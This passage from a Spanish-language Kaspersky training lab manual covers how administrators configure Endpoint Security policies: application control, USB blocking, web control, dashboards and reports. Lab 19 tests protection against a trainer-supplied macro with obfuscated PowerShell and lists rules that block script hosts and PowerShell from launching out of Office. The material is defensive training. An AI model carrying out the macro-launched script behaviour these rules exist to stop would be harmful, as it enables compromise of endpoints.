40) Inicie sesión en el abc \ Alex cuenta, contraseña Ka5per5Ky

41) Haga doble clic ransomware.bat para ejecutarlo


L – 101
Laboratorio 15.

Cómo bloquear el inicio de aplicaciones desconocidas en la red

42) Tenga en cuenta que KES bloquea ransomware.bat y


muestra la notificación correspondiente

43. Haga clic en Okay para cerrar el mensaje de error

Cambiar a la Centro de Seguridad computadora.

44. Abra Kaspersky


Consola web del centro de
seguridad

45. Ir a Dispositivos | Políticas


Y perfiles

46. ​Abrir la política


Kaspersky Endpoint
Security para Windows
(11.1.0)

47. Cambie a la
Configuraciones de la aplicación

lengüeta

48. Abra el Seguridad


Control S sección

49. Seleccione el Solicitud


Controlar componente
L – 102 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

50. Desactivar el Solicitud


Controlar componente

51. Haga clic Okay

52. Haga clic Salvar para salvar el

política

53. Espere a que la política sea


forzado

Conclusión

Este laboratorio demuestra cómo los administradores, al configurar adecuadamente el producto, pueden bloquear el inicio de archivos nuevos y desconocidos en los puntos
finales. Al hacerlo, limitarán la probabilidad de una infección en las máquinas protegidas.

Laboratorio 16.

Cómo bloquear unidades flash USB

Guión. Usted es administrador en ABC Inc., cuya red está protegida con Kaspersky Endpoint Security. Se gestiona a través del Centro de seguridad de
Kaspersky.

El análisis de incidentes ha revelado que muchas computadoras se han infectado a través de unidades flash USB. Se tomó la decisión de eliminar este vector de
penetración. Su tarea es bloquear el acceso a todas las unidades flash USB con Kaspersky Endpoint Security en todas las estaciones de trabajo en la red ABC.

Contenido. En este laboratorio, bloquearemos el acceso a las unidades flash USB.

Tarea A: Configurar el bloqueo de unidades flash USB

En esta tarea, aprenderemos cómo configurar notificaciones para usuarios de terminales en la política.
L – 103
Laboratorio 16.

Cómo bloquear unidades flash USB

La tarea se realiza en Tom-Laptop.


los CORRIENTE CONTINUA, Centro de Seguridad, y Alex-Desktop Las máquinas deben estar encendidas.

1. Inicie sesión en abc \ Tom


cuenta. Contraseña-
Ka5per5Ky

2) Conecte la unidad flash USB


con los folletos del curso en la
computadora host

3. En el menú de
VMware Estación de trabajo,

hacer clic VM, dispositivos


extraíbles, <su tipo de unidad>,
conectar (desconectarse del host)

4. En el Tom-Laptop computadora, haga clic Comienzo,

Computadora

5) Asegúrese de que la unidad flash USB haya sido


conectado con éxito

Cambiar a la Centro de Seguridad computadora.

6. Abra Kaspersky
Consola web del centro de
seguridad

7. Ir a Dispositivos | Políticas
Y perfiles

8. Abra la política
Kaspersky Endpoint
Security para Windows
(11.1.0)

9. Cambie a la
Configuraciones de la aplicación

lengüeta

10. Abra el Seguridad


Control S sección

11. Seleccione el Dispositivo

Controlar componente
L – 104 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

12. Haz clic en el enlace Acceso

reglas para dispositivos y


redes wifi

13. Haz clic en el enlace.

Discos extraíbles

14. Tenga en cuenta que el acceso a

dispositivos Depende del autobús

15. Para el Acceso


parámetro, seleccione Negar

16. Haga clic en Okay


L – 105
Laboratorio 16.

Cómo bloquear unidades flash USB

17. Asegúrese de que el acceso a


Discos extraíbles se establece en

Negar

18. Haga clic en Okay

19. Haga clic en Salvar para salvar el

política

20. Espera a que la política sea


forzado

Tarea B: Prueba de bloqueo de unidades flash USB

En esta tarea, intentaremos acceder al dispositivo que ya está conectado a la computadora.

La tarea se realiza en Tom-Laptop.


los CORRIENTE CONTINUA, Centro de Seguridad, y Alex-Desktop Las máquinas deben estar encendidas.

21) Inicie sesión en el abc \ Tom cuenta. Contraseña- Ka5per5Ky

22) Tenga en cuenta que la unidad flash USB todavía se muestra

entre Dispositivos y unidades

23) Abra la unidad flash USB.

24) Tenga en cuenta que a pesar del hecho de que la unidad extraíble es visible, es
inaccesible

25) Cierra el mensaje de Windows


L – 106 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

26. Haga clic en Solicitar acceso

27) Leer el mensaje

28. Haga clic en Enviar

Tarea C: Recibir una solicitud del usuario

En esta tarea, recibiremos una solicitud de acceso a la unidad USB del usuario.

La tarea se realiza en Centro de Seguridad.


los CORRIENTE CONTINUA, Tom-Laptop, y Alex-Desktop Las máquinas deben estar encendidas.

29. Abra Kaspersky


Consola web del centro de
seguridad

30. Cambie a la
Monitoreo e informes |
Selecciones de eventos lengüeta

31. Seleccione la casilla de verificación

cerca de Solicitudes de usuario

32. Haga clic comienzo


L – 107
Laboratorio 17.

Cómo configurar permisos granulares para unidades flash USB

33. Lea la solicitud

Conclusión

En este laboratorio, estudiamos cómo bloquear el acceso a unidades extraíbles. Además de bloquear el acceso por completo, también puede permitir el acceso a pedido o permitir solo
dispositivos específicos. Por lo general, los administradores utilizarán esta funcionalidad para bloquear la propagación de malware a través de unidades extraíbles en la red. Esta
característica también puede ayudar a prevenir la fuga de datos.

Laboratorio 17.

Cómo configurar permisos granulares para unidades flash USB

Guión. Usted es administrador en ABC Inc., cuya red está protegida con Kaspersky Endpoint Security. Se gestiona a través del Centro de seguridad de
Kaspersky.

Tiene prohibido el acceso a unidades flash USB en toda la empresa. Sin embargo, la medida resultó ser demasiado agresiva ya que algunos usuarios necesitan unidades flash
USB para tareas relacionadas con el trabajo. La decisión de permitir que todos los usuarios usen unidades flash USB cifradas se tomó en la compañía.

Ahora, permitiremos a los usuarios leer y copiar archivos de unidades flash USB; agregar unidades flash USB encriptadas a dispositivos confiables y así permitir que los usuarios del
dominio accedan a ellas sin limitaciones; y también configure las operaciones de registro con estas unidades flash USB.

Contenido. En este laboratorio, haremos lo siguiente:

1) Prohibir a todos los usuarios escribir archivos en unidades flash USB


2) Permita que los usuarios del dominio escriban archivos en unidades flash USB confiables

Tarea A: Prohibir a todos los usuarios escribir archivos en unidades flash USB

Abra la configuración de Control de dispositivos en la política de Kaspersky Endpoint Security del grupo de estaciones de trabajo. Permita que los usuarios (Todos) lean archivos de
unidades extraíbles.

La tarea se realiza en Tom-Laptop.


los CORRIENTE CONTINUA, Centro de Seguridad, y Alex-Desktop Las máquinas deben estar encendidas.
L – 108 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

1. Inicie sesión en abc \ Tom


cuenta. Contraseña-
Ka5per5Ky

2) Conecte la unidad flash USB


con los folletos del curso en la
computadora host

3. En el menú de
VMware Estación de trabajo,

hacer clic VM, dispositivos


extraíbles, <su tipo de unidad>,
conectar (desconectarse del host)

4. En el Tom-Laptop computadora, haga clic Comienzo,

Computadora

5) Asegúrese de que la unidad flash USB haya sido


conectado con éxito

Cambiar a la Centro de Seguridad computadora.

6. Abra Kaspersky
Consola web del centro de
seguridad

7. Ir a Dispositivos | Políticas
Y perfiles

8. Abra la política
Kaspersky Endpoint
Security para Windows
(11.1.0)

9. Cambie a la
Configuraciones de la aplicación

lengüeta

10. Abra el Seguridad


Control S sección

11. Seleccione el Dispositivo

Controlar componente
L – 109
Laboratorio 17.

Cómo configurar permisos granulares para unidades flash USB

12. Haz clic en el enlace Acceso

reglas para dispositivos y


redes wifi

13. Haz clic en el enlace.

Discos extraíbles

14. Tenga en cuenta que el acceso a

dispositivos se establece en Negar

15. Prohibir a los usuarios


escritura en unidades extraíbles:
borre el Escribir
casilla de verificación y haga clic Okay

16. Guarde la política y espere


para que se haga cumplir
L – 110 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

Cambiar a Tom-Laptop

17) Abra la unidad flash USB.

18) Copie cualquier archivo de la unidad flash al escritorio

19) Intente copiar un archivo desde el escritorio a la unidad flash USB

20) Asegúrese de que Kaspersky Endpoint Security no permita


copiando a la unidad flash

21) Cierra el mensaje de Windows

Tarea B: Permitir a los usuarios del dominio escribir archivos en unidades flash USB confiables

Abra la configuración de Control de dispositivos en la política de Kaspersky Endpoint Security del grupo de estaciones de trabajo. Haga que la unidad extraíble sea confiable para el grupo de usuarios del

dominio. Seleccione para registrar eventos cuando los usuarios escriban archivos en unidades flash USB.

La tarea se realiza en Centro de Seguridad.


los CORRIENTE CONTINUA, Tom-Laptop, y Alex-Desktop Las máquinas deben estar encendidas.

22. Abra Kaspersky


Consola web del centro de
seguridad

23. Ir a Dispositivos | Políticas


Y perfiles

24. Abrir la política


Kaspersky Endpoint
Security para Windows
(11.1.0)

25. Cambie a la
Configuraciones de la aplicación

lengüeta

26. Abra el Seguridad


Control S sección

27. Seleccione el Dispositivo

Controlar componente
L – 111
Laboratorio 17.

Cómo configurar permisos granulares para unidades flash USB

28. Haga clic en el enlace Acceso

reglas para dispositivos y


redes wifi

29. Haga clic en el enlace

Discos extraíbles

30. Abra el Inicio sesión lengüeta

31. Habilitar Inicio sesión


L – 112 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

32. Haga clic en el Añadir botón en

la parte inferior de la ventana para

especificar un grupo de usuarios

33. Tipo todo el mundo y


haga clic en el icono de
lupa

34. Elija el Todo el mundo


grupo

35. Haga clic en Seleccione

36. Haga clic en Okay


L – 113
Laboratorio 17.

Cómo configurar permisos granulares para unidades flash USB

37. Haga clic en el enlace Trusted

dispositivos

38. Hacer el extraíble


unidad de confianza: haga clic en Agregar

dispositivo por ID

39. En la lista de dispositivos,


Seleccione Dispositivo USB

genérico de disco flash

40. Haga clic en próximo

41. Seleccione el Dominio


Los usuarios grupo

42. Haga clic en próximo


L – 114 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

43. Haga clic en Okay

44. Asegúrese de que el


dispositivo se ha convertido en

confiable para el Usuarios de dominio grupo

45. Haga clic Okay

46. ​Cambie a la
Configuraciones de la aplicación

lengüeta

47. Abra el General


Configuraciones sección

48. Haga clic Interfaz

49. En el Notificaciones
área, haga clic en el

Reglas de notificación enlace

50. Seleccione el Dispositivo

Controlar componente

51. Seleccione para Guardar en local

Iniciar sesión el Operación de

archivo realizada eventos y clic Okay

52. Haga clic Salvar para salvar el

política

53. Espere a que la política sea


forzado
L – 115
Laboratorio 18.

Cómo configurar el control de acceso web

Cambiar a Tom-Laptop

54) Copia el factura.txt archivo del escritorio a la unidad flash USB

55) Asegúrese de que Kaspersky Endpoint Security le permite escribir archivos en un dispositivo confiable

Cambiar a la Centro de Seguridad computadora.

56. Abra Kaspersky


Consola web del centro de
seguridad

57. Cambiar a Supervisión


& Informes. Abre el
Informes lengüeta

58. Seleccione el Informar sobre

operaciones de archivo en

unidades extraíbles

59. Haga clic en Mostrar reporte

60. Cambie a la Detalles


lengüeta. Asegúrese de que el
informe informa que el
ABC \ Tom el usuario guardó el factura.txt
archivo a una unidad extraíble

Conclusión

En esta práctica de laboratorio, estudiamos cómo controlar los derechos de acceso de los usuarios a las unidades flash USB junto con hacer exclusiones para tipos de unidades específicas.
Siempre hay usuarios en una empresa (secretarias, por ejemplo) que necesitan copiar datos a / desde varias unidades flash USB cuyo modelo y número de serie generalmente no se conocen de
antemano.

Otros (como los administradores, por ejemplo) suelen tener esta información fácilmente disponible. Puede configurar exclusiones para estas unidades. La política
proporciona ajustes flexibles: puede crear una lista de unidades flash USB específicas a las que se pueda acceder y especificar usuarios y / o grupos que las usen.

Laboratorio 18.

Cómo configurar el control de acceso web

Guión. Usted es un administrador de seguridad antivirus en ABC Inc. cuya red está protegida con Kaspersky Endpoint Security. Se gestiona a través del Centro de seguridad
de Kaspersky. Al analizar el tráfico de Internet de la compañía, descubrió que muchos usuarios visitan sitios web de intercambio de criptomonedas durante el horario
comercial. En base a esta información, le gustaría prohibirlo al establecer una política para bloquear específicamente el acceso a la categoría de contenido respectiva.
L – 116 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

Contenido. En este laboratorio, bloquearemos el acceso a los sitios web de intercambio de criptomonedas.

Tarea A: Cree una regla para bloquear el acceso a los sitios web de intercambio de criptomonedas

En esta tarea, configuraremos la política para bloquear el acceso a los sitios web de intercambio de criptomonedas para todos los usuarios durante el horario comercial.

La tarea se realiza en Centro de Seguridad.


los CORRIENTE CONTINUA, Tom-Laptop, y Alex-Desktop Las máquinas deben estar encendidas.

1. Abra Kaspersky
Consola web del centro de
seguridad

2. Ir a Dispositivos | Políticas
Y perfiles

3. Abra la política
Kaspersky Endpoint
Security para Windows
(11.1.0)

4. Cambie a la
Configuraciones de la aplicación

lengüeta

5. Abra el Seguridad
Control S sección

6. Seleccione el Control web


componente

7. Haga clic en Añadir


L – 117
Laboratorio 18.

Cómo configurar el control de acceso web

8. En el Nombre de la regla Tipo de campo CRIPTOMONED

9. Para el Acción, Seleccione

Bloquear

10. Seleccione el Por contenido

categorías caja

11. Haz clic en el enlace Contenido

categorías

12. En el Contenido
categorías lista, debajo
Tiendas en línea, bancos,
sistemas de pago,
Seleccione

Criptomonedas y minería

13. Haga clic en Okay

14. Seleccione la opción Aplicar


a usuarios individuales y / o
grupos

15. Haga clic en Añadir


L – 118 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

16. En el cuadro de búsqueda, escriba

todo el mundo

17. Elija el respectivo


grupo

18. Haga clic en Seleccione

19. Agregar programación. En el


Calendario de reglas área, haga

clic Siempre

20. Crea un nuevo horario:


Hacer clic Añadir

21. Tipo Horas de trabajo


para el nombre de la regla

22. Configure el horario


bloquear el acceso a las redes
sociales de lunes a viernes de
9:00 a.m. a 6:00 p.m.

23. Click Okay


L – 119
Laboratorio 18.

Cómo configurar el control de acceso web

24. Seleccione el horario


Horas de trabajo

25. Click Okay

26. Asegúrese de que el


CRIPTOMONEDAS
se ha creado la regla de
bloqueo

27. Haga clic Okay

28. Haga clic en Salvar para salvar el

política

29. Espere a que la política sea


forzado

Tarea B: Pruebe si el acceso a los sitios web de intercambio de criptomonedas está bloqueado

En esta tarea, nos aseguraremos de que se aplique la regla y que la categoría de criptomonedas y minería esté bloqueada.

La tarea se realiza en Tom-Laptop.


los CORRIENTE CONTINUA, Centro de Seguridad, y Alex-Desktop Las máquinas deben estar encendidas.

30. Inicie sesión en abc \ Tom cuenta. Contraseña-


Ka5per5Ky

31) Inicie Internet Explorer

32. Ir a www.coinmarketcap.com

33) Asegúrese de que la regla bloquea el acceso a las redes sociales

34) Cerrar la ventana de Internet Explorer


L – 120 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

Tarea C: Consultar informes en Kaspersky Security Center


La tarea se realiza en Centro de Seguridad.
los CORRIENTE CONTINUA, Tom-Laptop, y Alex-Desktop Las máquinas deben estar encendidas.

35) Abra Kaspersky Security


Consola web central

36. Cambiar a Supervisión &


Informes | Selecciones de

eventos

37. Seleccione Eventos recientes

38. Haga clic en comienzo

39) Abrir el último evento desde


Tom-Laptop

40. Tenga en cuenta que el control web

acceso bloqueado al sitio web


www.coinmarketcap.com

Conclusión

En este laboratorio, estudiamos la funcionalidad que bloquea el acceso a los sitios web. El acceso se puede permitir o bloquear por categoría de contenido, tipo de datos o ambos. El acceso
puede bloquearse solo durante un período de tiempo específico y aplicarse a grupos de usuarios o usuarios específicos. Un ejemplo de uso típico para esta funcionalidad es bloquear el acceso
a las redes sociales, archivos ejecutables o correo electrónico externo, a través del cual se puede filtrar información y / o se pueden descargar objetos infectados.
L – 121
Laboratorio 19.

Cómo configurar el control adaptativo de anomalías

Laboratorio 19.

Cómo configurar el control adaptativo de anomalías

Guión. Sus computadoras de red están protegidas con Kaspersky Endpoint Security y administradas a través de Kaspersky Security Center. Ha aparecido un nuevo
componente en el producto que permite monitorear scripts y macros y detectar anomalías del sistema. Ha decidido probar la salud de este componente de
protección. Para este propósito, utilizará un archivo * .xlsx con una macro que contiene un script de PowerShell ofuscado preparado de antemano.

Contenido. En este laboratorio, haremos lo siguiente:

1) Configurar macros y scripts de bloqueo en documentos de Office


2) Asegúrese de que el Control adaptativo de anomalías bloquee una macro maliciosa
3) Configure la prevención de exploits para bloquear macros maliciosas

Tarea A: Configurar macros y scripts de bloqueo en documentos de Office

Deshabilite todos los componentes de protección principales.

De forma predeterminada, el componente de protección Adaptive Anomaly Control funciona en el modo de estadísticas al principio y recopila datos sobre programas y scripts iniciados.
Para probar cómo el componente detecta archivos maliciosos, cámbielo manualmente al modo de bloqueo.

La tarea se realiza en Centro de Seguridad.


los CORRIENTE CONTINUA, Alex-Desktop, y Tom-Laptop Las máquinas deben estar encendidas.

1. Abra Kaspersky
Consola web del centro de
seguridad

2. Ir a Dispositivos | Políticas
Y perfiles

3. Abra la política
Kaspersky Endpoint
Security para Windows
(11.1.0)

4. Cambie a la
Configuraciones de la aplicación

lengüeta

5. Desactivar Explotar

Prevención
L – 122 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

6. Seleccione Seguridad

Control S

7) Abra la configuración de la
Control Adaptativo de
Anomalías componente

8. Haga clic en el Reglas enlace a

configurar reglas de detección

9) Expande la lista de reglas Actividad de aplicaciones de oficina.

10) Cambie las reglas al modo de bloqueo: cambie la acción de Inteligente a Bloquear para las siguientes reglas:

- Inicio de Microsoft Console Based Script Host desde la aplicación de Office


- Inicio de Microsoft Windows Based Script Host desde la aplicación de Office
- Inicio del procesador de comandos de Microsoft Windows desde la aplicación de Office
- Inicio de Microsoft PowerShell desde la aplicación de Office
- Inicio del archivo incrustado desde la aplicación de Office
L – 123
Laboratorio 19.

Cómo configurar el control adaptativo de anomalías

11. Guarde la política: haga clic en

Okay y Salvar

12. Confirma que quieres


para usar la configuración

especificada: haga clic en si

13. Espere a que la política sea


aplicado

Tarea B: Asegúrese de que el Control adaptativo de anomalías bloquee una macro maliciosa

Envíe un mensaje con un archivo adjunto que contenga un script malicioso y asegúrese de que el archivo se bloqueará.

La tarea se realiza en Alex-Desktop.


los CORRIENTE CONTINUA, Centro de Seguridad, y Tom-Laptop Las máquinas deben estar encendidas.

14. correr Microsoft Outlook

15. Crea un nuevo mensaje:

- Especifique el destinatario. En el A: Tipo de campo Tom@abc.lab

- En el Tema: caja, tipo Reporte semanal

- Adjunta Weekly_report.xlsm presentar el mensaje (pregunte al entrenador dónde


está ubicado)

dieciséis. Envíe el mensaje: haga clic Enviar

Cambiar a Tom-Laptop

17. correr Microsoft Outlook

18. Abra el Semanal


report.xlsm adjunto archivo
L – 124 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

19. En el Microsoft Excel


ventana, haga clic Permitir la

edición

20. En el Microsoft Excel


ventana, haga clic Contenido

disponible

21) Asegúrese de que haya un mensaje informando sobre

prohibido PowerShell.exe inicio ha aparecido

22. Haga clic en Okay

23) Asegúrese de que era Kaspersky Endpoint


Seguridad que bloqueó la acción.
L – 125
Laboratorio 19.

Cómo configurar el control adaptativo de anomalías

24) Abra el informe de la aplicación.

25. Seleccione Control Adaptativo de Anomalías

26) Encuentra y lee el evento sobre una acción bloqueada

27. Cerrar el Microsoft Excel ventana

Tarea C: Configure Prevención de exploits para bloquear macros maliciosas

En la política de Kaspersky Endpoint Security, habilite los componentes de Prevención de exploits y Detección de comportamiento, y cambie el modo de operación de las reglas de Control
adaptativo de anomalías.

La tarea se realiza en Centro de Seguridad.


los CORRIENTE CONTINUA, Alex-Desktop, y Tom-Laptop Las máquinas deben estar encendidas.

28. Abra Kaspersky


Consola web del centro de
seguridad

29. Ir a Dispositivos | Políticas


Y perfiles

30. Abrir la política


Kaspersky Endpoint
Security para Windows
(11.1.0)
L – 126 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

31. Cambie a la
Configuraciones de la aplicación

lengüeta

32. Seleccione Seguridad

Control S

33. Abra la configuración de


Control Adaptativo de
Anomalías componente

34. Haga clic en el Reglas enlace a

configurar reglas de detección

35) Expande la lista de reglas Actividad de aplicaciones de oficina.

36) Cambiar la acción de Bloquear a Inteligente para las siguientes reglas:

- Inicio de Microsoft Console Based Script Host desde la aplicación de Office


- Inicio de Microsoft Windows Based Script Host desde la aplicación de Office
- Inicio del procesador de comandos de Microsoft Windows desde la aplicación de Office
- Inicio de Microsoft PowerShell desde la aplicación de Office
- Inicio del archivo incrustado desde la aplicación de Office

37. Haga clic Okay dos veces


L – 127
Laboratorio 19.

Cómo configurar el control adaptativo de anomalías

38. En Amenaza avanzada


Proteccion, Seleccione

Prevención de exploits

39. Habilite el Explotar


Prevención componente

40. Haga clic en Okay

41. De manera similar,


habilitar Detección de

comportamiento

42. Haga clic en Salvar para salvar el

política

43. Confirma que quieres


para usar la configuración

especificada: haga clic en si

44. Espere a que la política sea


aplicado
L – 128 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

Cambiar a Tom-Laptop

45. abierto Microsoft


panorama

46. ​Abra el Semanal


report.xlsm adjunto en Microsoft
Excel

47. En el Microsoft Excel


ventana, haga clic Permitir la

edición

48. En el Microsoft Excel


ventana, haga clic Contenido

disponible
L – 129
Laboratorio 20.

Cómo configurar el tablero de instrumentos

49) Asegúrese de que haya un mensaje informando sobre

prohibido Potencia Shell inicio ha aparecido

50. Haga clic Okay

51) Abrir informes de Kaspersky Endpoint Security

52) Cambie al informe de la Prevención de exploits


componente

53) Asegúrese de que se haya detectado el exploit y


obstruido

54. Cerrar Microsoft Excel y Microsoft Outlook

Conclusión

Ha verificado el estado de la protección multinivel contra macros y scripts maliciosos incrustados en documentos de Office.

Puede usar cada componente individualmente o combinarlos según sea necesario para proteger las estaciones de trabajo.

Laboratorio 20.

Cómo configurar el tablero de instrumentos

Guión. Sus computadoras de red están protegidas con Kaspersky Endpoint Security y administradas a través de Kaspersky Security Center. En su rutina diaria, abre la
consola de administración de KSC para monitorear el estado de las aplicaciones. Para tener una visión general rápida del estado de protección, configure el tablero para
resumir el estado de sus sistemas.

Contenido. En esta práctica de laboratorio, configurará el tablero para el monitoreo diario.


L – 130 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

Tarea A: Agregar nuevos widgets al tablero


La tarea se realiza en Centro de Seguridad.
los CORRIENTE CONTINUA, Tom-Laptop, y Alex-Desktop Las máquinas deben estar encendidas.

1. Abra el Kaspersky
Consola web del centro de
seguridad

2. Cambie a la
Monitoreo e informes |
Tablero
lengüeta

3. Tenga en cuenta que Kaspersky

Security Center Web Console


tiene algunos widgets
preestablecidos

4) Para crear un nuevo widget,


hacer clic Agregar o restaurar

widget

5. Expandir Actualizar y
Seleccione Distribución de bases

de datos antivirus.

6. Haga clic en Añadir


L – 131
Laboratorio 20.

Cómo configurar el tablero de instrumentos

7. Un nuevo widget ha sido


añadido a la página

8. Haga clic en Agregar o restaurar

widget

9. Expandir Estadísticas de
amenazas y seleccione

Historial de ataques a la
red.

10. Haga clic en Añadir

11. Para editar los widgets


representación, haga clic en su icono de

engranaje

12. Seleccione Tipo de gráfico:

Líneas
L – 132 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

13. Representación del widget


ha cambiado

Tarea B: Eliminar y reorganizar widgets

Elimine los widgets innecesarios y reorganice los demás en el tablero.

La tarea se realiza en Centro de Seguridad.


los CORRIENTE CONTINUA, Tom-Laptop, y Alex-Desktop Las máquinas deben estar encendidas.

14. En el Nuevos dispositivos

widget, haga clic en el icono de

engranaje y seleccione Ocultar

widget
L – 133
Laboratorio 20.

Cómo configurar el tablero de instrumentos

15. Haga clic en Okay para confirmar

16. Tenga en cuenta que los widgets

se han movido para cerrar la brecha

17. En el Más frecuente


amenazas widget, haga clic en el icono

de engranaje y seleccione

Moverse

18. Haga clic en el Amenaza

actividad widget que


actualmente ocupa el lugar al
que desea mover el Amenazas
más frecuentes

widget

19. Los widgets han sido


reubicado

Conclusión

Ha agregado los widgets que necesita al tablero, que muestra la información más importante sobre la protección de la red.
L – 134 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

Laboratorio 21.

Cómo configurar herramientas de mantenimiento

Guión. Sus computadoras de red están protegidas con Kaspersky Endpoint Security y administradas a través de Kaspersky Security Center. Para poder encontrar la información necesaria y
reaccionar a las amenazas más rápido, elimine los informes que no usa, prepare una tarea de detección de virus que se pueda iniciar desde los menús de acceso directo de las computadoras y
configure los informes semanales que se le enviarán por correo electrónico.

Contenido. En este laboratorio, haremos lo siguiente:

1) Eliminar informes innecesarios


2) Cree un informe sobre las computadoras infectadas durante la semana anterior.
3) Configure los informes más importantes para enviar por correo electrónico

Tarea A: Eliminar informes innecesarios

Eliminar todos los informes excepto:

- Informe de la versión del software de Kaspersky Lab

- Informe de amenazas

- Informar sobre carreras bloqueadas

- La mayoría de las computadoras infectadas informan

- Informar sobre usuarios de dispositivos infectados

- Informe de control web


- Informe de implementación de protección

- Informe de ataque a la red


- Informe de estado de protección

- Informe sobre operaciones de archivos en unidades extraíbles

- Informe de uso clave


- Informe de uso de la base de datos antivirus

La tarea se realiza en Centro de Seguridad.


los CORRIENTE CONTINUA, Tom-Laptop, y Alex-Desktop Las máquinas deben estar encendidas.

1. Abra Kaspersky
Consola web del centro de
seguridad

2. Cambie a la
Monitoreo e informes |
Informes
lengüeta

3. Seleccione el Errores

reporte

4. Haga clic en Eliminar

5. Confirma que quieres


para eliminar el informe: haga clic

en Okay
L – 135
Laboratorio 21.

Cómo configurar herramientas de mantenimiento

6) Elimine los siguientes informes de manera similar:

- Informe de hardware

- Informar sobre aplicaciones incompatibles


- Informar sobre errores de cifrado de archivos

- Informe sobre el bloqueo de acceso a archivos cifrados


- Informar sobre usuarios de dispositivos

- Informe sobre permisos de usuario efectivos


- Informe sobre el estado de cifrado de dispositivos de almacenamiento masivo

- Informe sobre registro de hardware


- Informe de la versión del software de Kaspersky Lab

- Informe sobre el uso de claves por el Servidor de Administración virtual

- Informe sobre derechos

- Informe sobre los derechos sobre el acceso a dispositivos cifrados

- Informe sobre ejecuciones bloqueadas de prueba

- Informe de actualizaciones de software

- Informe de vulnerabilidades

- Informe sobre controladores atacados

- Informe sobre la comprobación de la integridad de los controladores lógicos programables (PLC)

- Informe sobre los resultados de la instalación de actualizaciones de software de terceros

Tarea B: Crear un informe semanal sobre computadoras infectadas

Renombrar el Informe sobre los dispositivos más infectados a Informe mensual sobre los dispositivos más infectados.

Cree otro informe sobre computadoras infectadas, pero programe el informe para que se genere semanalmente.

La tarea se realiza en Centro de Seguridad.


los CORRIENTE CONTINUA, Tom-Laptop, y Alex-Desktop Las máquinas deben estar encendidas.
L – 136 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

7. Abra las propiedades de


el Informe sobre los
dispositivos más infectados

8. Cambie el nombre del informe a

Informe mensual sobre los


dispositivos más infectados y
haga clic Salvar

9) Cerrar la ventana del informe

10. Cree un nuevo informe:


Haga clic en el Añadir botón

11. Nombra el informe Semanal


informar sobre los dispositivos
más infectados

12. Expandir Estadísticas de


amenazas y seleccione

Informe sobre los


dispositivos más
infectados

13. Haga clic en próximo

14. Seleccione Administración


grupo y entonces
Dispositivos gestionados

15. Haga clic en próximo


L – 137
Laboratorio 21.

Cómo configurar herramientas de mantenimiento

16. Establecer el período del informe

a 7 días y haga clic Okay

17. En la ventana que


abre, haga clic Salvar

Tarea C: Configure los informes más importantes para enviar por correo electrónico

Configure los siguientes informes para que se envíen semanalmente por correo electrónico los lunes a las 10 a. M .:

- Informe de estado de protección

- Informe de uso de la base de datos antivirus

- Informe semanal sobre los dispositivos más infectados


- Informe de ataque a la red

La tarea se realiza en Centro de Seguridad.


los CORRIENTE CONTINUA, Tom-Laptop, y Alex-Desktop Las máquinas deben estar encendidas.

18. Abra Kaspersky


Consola web del centro de
seguridad

19. Abra el Dispositivos |


Tareas lengüeta

20. Crea un informe enviando


tarea: haga clic en Añadir

21. Seleccione Kaspersky


Centro de seguridad 11 en la
lista de aplicaciones

22. Para el tipo de tarea,


especificar Entregar informes

23. Nombra la tarea Entregar


informes

24. Haga clic en próximo


L – 138 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

25. Seleccione lo siguiente


informes:

- Informe semanal sobre


los dispositivos más
infectados

- Informe de uso de la base de

datos antivirus

- Informe de ataque a la
red

26. Especifique la entrega


método: Enviar informes por correo

electrónico

27. Haga clic Configuraciones

28. En el Dirección de correo electrónico

Tipo de campo

administrador@abc.lab

29. Haga clic Okay


L – 139
Laboratorio 21.

Cómo configurar herramientas de mantenimiento

30. Haga clic en próximo

31. Haga clic próximo

32. Desactive la casilla de verificación

Abrir detalles de la tarea

cuando se completa la

creación

33. Haga clic en Terminar

34. Haga clic en el Entregar

informes enlace

35. Cambie a la Calendario


lengüeta

36. Establecer el intervalo de correo electrónico

a Semanal

37. Seleccione lunes y


9:00 am, y haga clic
Salvar
L – 140 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

Conclusión

Ha eliminado informes no utilizados y ahora podrá encontrar los necesarios más rápido.

Laboratorio 22.

Cómo recopilar información de diagnóstico

Guión. Sus computadoras de red están protegidas con Kaspersky Endpoint Security y administradas a través de Kaspersky Security Center. Los componentes de Kaspersky
Endpoint Security no se iniciarán en una computadora corporativa, y no ha podido descubrir las razones del incidente. Recopile registros de seguimiento de Kaspersky
Endpoint Security para enviarlos al soporte técnico. Hazlo de forma remota desde la consola de administración.

Contenido. En este laboratorio, recopilará de forma remota registros de seguimiento de una computadora.

Tarea A: Recopilar registros de seguimiento de una computadora

